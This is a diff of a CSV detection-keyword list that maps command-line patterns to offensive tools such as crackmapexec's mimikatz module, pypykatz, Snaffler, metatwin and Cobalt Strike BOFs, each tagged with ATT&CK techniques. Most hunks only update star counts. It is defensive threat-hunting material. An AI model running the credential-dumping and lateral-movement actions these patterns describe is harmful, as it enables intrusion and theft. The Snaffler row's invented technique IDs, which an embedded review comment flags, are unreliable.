TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* smb client * shares *use c$*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb shareenum *smb2+ntlm-password*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1808,7 +1808,7 @@ "* smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1844,8 +1844,8 @@ "* smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" -"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - 
T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for 
pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "* sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
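Review bot: The `* snaffler.log*` row on the new side still carries a `metadata_tool_techniques` value that enumerates `T1003.001` through `T1003.123`, although ATT&CK defines only T1003.001–T1003.008 under OS Credential Dumping, so most of those IDs resolve to nothing when a SIEM mapping or Navigator layer is built from this column. The tactics value `TA0003 - TA0004` (Persistence, Privilege Escalation) also does not fit the row's own description of a tool that hunts for credentials in a Windows/AD environment. This hunk changes only the star count (1569 to 1570), so the field is carried over unchanged. I would replace the techniques with something like `T1083 - T1135 - T1039 - T1552.001` and the tactics with `TA0006 - TA0007 - TA0009`, to be confirmed against the Snaffler documentation. The sequential run looks machine-generated, so whatever produces this column probably needs a validation step that rejects IDs absent from the ATT&CK catalogue.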
@@ -1859,37 +1859,37 @@ "* snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Source c:\windows\*.exe -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* -Source c:\windows\system32\*.dll -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" -"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" -"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
